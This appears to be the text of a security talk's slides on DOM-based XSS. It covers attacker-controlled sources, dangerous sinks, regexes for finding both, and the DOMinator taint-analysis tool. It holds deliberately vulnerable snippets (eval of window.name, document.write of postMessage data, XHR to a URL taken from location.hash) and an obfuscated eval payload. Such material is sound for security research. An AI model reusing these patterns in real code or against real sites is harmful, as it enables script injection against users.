What Is DOM Based XSS
Index :
- DOM Based XSS
- JS Sources & Sinks
- Analysis of interesting examples
- DOMinator
- Some stats
DOM Based XSS
JavaScript objects are loosely typed.
- If we just want to pass an existence check we can substitute an iframe window for a normal object
- OWASP DOM Based Xss: https://www.owasp.org/index.php/DOM_Based_XSS
- DOMXss Wiki https://code.google.com/p/domxsswiki/wiki/Index
Code Flow & Terminology
- Sources: the input data that can be directly or indirectly controlled by an attacker.
- Filters: operations on Sources which change the content or check for specific structures/values.
- Sinks: potentially dangerous functions the can be abused to take advantage of some kind of exploitation.
Input Sources
- Everything taken from the URL: document.URL document.URLUnencoded document.location (.pathname|.href|.search|.hash) window.location (.pathname|.href|.search|.hash)
- The Referrer: document.referrer
- The window name: window.name
Input Sources
- Input Sources
- document.cookie
- HTML5 postMessagearg.data
- window.dialogArguments(whenwindowisopenedwithwindow.showModalDialog)
CssDOM Injection getsensitive values
- Css3 Attribute Selectorhttp://www.w3.org/TR/css3-selectors/#attribute-selectorsa[href=a] { … }
- Css3 Attribute Substring Matchinghttp://www.w3.org/TR/css3-selectors/#attribute-substrings[att^=val]:Represents an element with the attattribute whose value begins with the prefix “val”.[att$=val]:Represents an element with the attattribute whose value ends with the suffix “val”.[att*=val]:Represents an element with the attattribute whose value contains at least one instance of the substring “val”
HTML 5
Cross Origin Request could be abused.varurl=“/profilePages”varxhr=new XMLHttpRequest();xhr.open(„GET‟,getQueryParam(„debugPage‟)||url,true);
Facebookissue #!/profileNamevarxhr=new XMLHttpRequest();xhr.open(„GET‟,location.hash.slice(2),true);Attacker just needs to add Access-Control-Allow-Origin: * to the response
Absolute URLs
ClassicsFilters–EncodingDifferences
Flow Control
Checks for opener, parent, topexistence can be fooled.
If(parent.frameMessage!=“sync”){addEventListener(“message”, function(d){document.write(‘..’+d.data+’…’)},true);} else{document.write(‘constantData’)}
Race Conditions –Time of Check to Time of Use.
If(window.name.match(/^[a-z]*=[0–9]*$/)){eval(window.name);}
BrowsersCountermeasures
3400 top site results in a number of :1Using the X-Content-Security-Policy with the following content
Methodology
Find the Sources using the following RegExp:
/ (location\s*[\[.])|([.\[]\s*[“‘]?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/
Find the Sinks using the following RegExp:(all Regexp© by Mario Heiderich)
/((src|href|data|location|code|value|action)\s*[“‘\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*[“‘\]]*\s*\()
Now you get the sources & sinks and finally you can follow the flow on code like the following.
Methodology … ?
- Javascriptis not that easy to analyze!
- Code can be Compressed (function (p,a,c,k,e,d){…..})()
- Obsfuscatedc=„‟, eval(unescape(“%u0540%u0556%u054C%u0519%u054E%u0550%u0557%u0518”).split(‘’ ).map(function(a){ c+=String.fromCharCode((a.charCodeAt(0)¹³³⁷))}))
- Or simply sla.ckers.ed:this.__parent__.[„l‟+0x6f+‟c‟+0x61+‟tion‟]
Possible Solutions
Static Analyzer:Pro: Very good at finding flows if well implemented. Very fast.Contra: the problems of every Static Analyzer: KB, reflection, runtime evaluation, lot of False Positives + False Negatives etc.
Script Injection to wrap sources and Sinks:Pro: use native interpreter so no problem with obfuscation/compressionContra: Cannot follow the flow.
Runtime Analysis with Dynamic Tainting:Pro: Uses native interpreter so no problem with obfuscation/compression, can follow the flow. Contra: doesn‟t look at alternative paths. Just propagates the taint flag. No tracking of operations. (mostly used for defense like on perltainting or php)
My Solution: DOMinator
DOMinator
- DOMinator is a tool for analyzing and identifying DOM Xss.Modified version of SpiderMonkey(JS Engine) to add Dynamic Tainting and perform Taint propagation Tracing.
- Modified version of Firefox to add taint propagation to DOM Attributes and chrome methods.
- Extension for Log Monitoring and runtime analysis.
googlecode project:http://code.google.com/p/dominator/downloads/list
Mailing List:http://groups.google.com/group/dominator-ml/
Tnx!
^_^
